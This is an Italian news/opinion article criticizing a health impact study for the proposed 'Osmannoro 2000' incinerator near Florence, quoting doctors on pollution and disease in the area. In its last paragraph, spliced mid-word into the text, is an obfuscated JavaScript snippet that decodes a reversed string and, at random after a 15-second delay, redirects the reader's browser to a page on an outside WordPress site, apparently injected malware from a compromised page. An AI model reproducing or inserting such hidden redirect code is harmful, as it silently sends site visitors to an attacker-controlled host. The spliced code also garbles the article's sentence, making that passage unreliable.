A testa bassa

image_pdfimage_print

di Roberto Deri

La VIS 2? Sconcertante. Questo il succo dei commenti raccolti alla Terza Conferenza Regionale sui rifiuti tenutasi a Sesto Fiorentino lo scorso 24 settembre. Per il professor Massimo Gulisano docente di Anatomia Umana nella Facoltà di Medicina e Chirurgia di Firenze, una valutazione sullo studio risulta addirittura imbarazzante : ”Non si dice ne che impianto sarà, ne che tipi di rifiuti brucerà, ma sulla base di valutazioni teoriche applicate a modelli preesistenti si sostiene che non ci saranno problemi, anche se è consigliabile allontanarlo di più dalle case! Lo studio è realizzato in maniera corretta dal punto di vista metodologico, ma non si fanno previsioni sulla base di dati scientifici”.
La ricerca sul progetto del nuovo mega-inceneritore, “Osmannoro 2000”, è stato commissionata dalla Provincia di Firenze ad un gruppo di lavoro interdisciplinare coordinato da Eva Buiatti, epidemiologa dell’Agenzia Regionale di Sanità della Toscana, Andrea Corti del Dipartimento di Energetica dell’Università degli Studi di Firenze e Fabrizio Bianchi della Sezione di Epidemiologia e Ricerca sui Servizi Sanitari. Le prime due fasi dello studio sono già state rese pubbliche e sono disponibili sul sito della provincia, mentre la terza ed ultima parte è ancora in corso di realizzazione.
La prima fase della VIS, quella di screeening, ha preso in esame l’area della piana fiorentina dal punto di vista sanitario, facendo il punto sulla condizione di salute generale della popolazione residente. Risultato: nella piana sono in numero superiore alla norma tumori e malattie polmonari, a Sesto Fiorentino son presenti diversi casi malformazioni dell’orecchio ed urogenitali, a Campi Bisenzio ancora malattie polmonari e malformazioni dell’occhio, ma anche casi di silicosi e linfomi (vedi tabella sottostante). Nella zona, guarda caso, sono concentrate una serie di strutture ad alto impatto sanitario ed epidemiologico: l’aeroporto, la ferrovia, l’autostrada, centri commerciali catalizzatori di traffico ed auto ed una sempre più grossa discarica.
E prossimamente, il mega-inceneritore benedetto dalla VIS? Il professor Beppe Banchi lo dice chiaramente: sono studi di questo tipo, elaborati a difesa delle scelte impopolari – e dannose per la salute pubblica – di amministrazioni o industrie, che hanno dato impulso alla nascita di gruppi di medici “coscienti”, poi associatisi in Medicina Democratica: “Uno studio realizzato da Medicina Democratica calcola le emissioni di diossina di un inceneritore ‘moderno’ pari a quelle emesse in un anno da 71 milioni di auto. A Stoccolma, nel maggio 2001, 127 paesi tra cui l’Italia hanno deciso le dodici sostanze inquinanti che non dovranno mai più essere prodotte nel mondo a causa della loro tossicità: tra queste c’è ovviamente la diossina. Basti pensare che un solo grammo di diossina è considerato pericoloso per 4 milioni e mezzo di persone”. Il dottor Michelangelo Bolognini, responsabile dell’Unità Funzionale Igiene e Sanità Pubblica della zona pistoiese e membro del coordinamento tosco ligure sulla difesa dell’ambiente, ha evidenziato che anche gli inceneritori più moderni non impediscono la fuoriuscita dai camini delle polveri fini, cosa che peraltro non è nascosta neanche dalla VIS. Ed anche altri medici, come l’epidemiologa Elisabetta Chellini ed il primario di Pneumologia dell’ospedale di Careggi Andrea Lopes Pegna non hanno mancato di esprimere le loro preoccupazioni rispetto al progetto.
Eppure, la Deliberazione di Consiglio Provinciale del febbraio 2002, che concerneva il piano provinciale di gestione dei rifiuti urbani ed assimilati per l‘Area Metropolitana Fiorentina, è stata approvata in una seduta “bulgara”. Qualsiasi emendamento che accennasse alla necessità di una riduzione della produzione dei rifiuti è stato respinto ad ampia maggioranza, conferm (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando la volontà politica di andare a testa bassa verso una soluzione stupida ed inefficiente sotto tutti i punti di vista.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *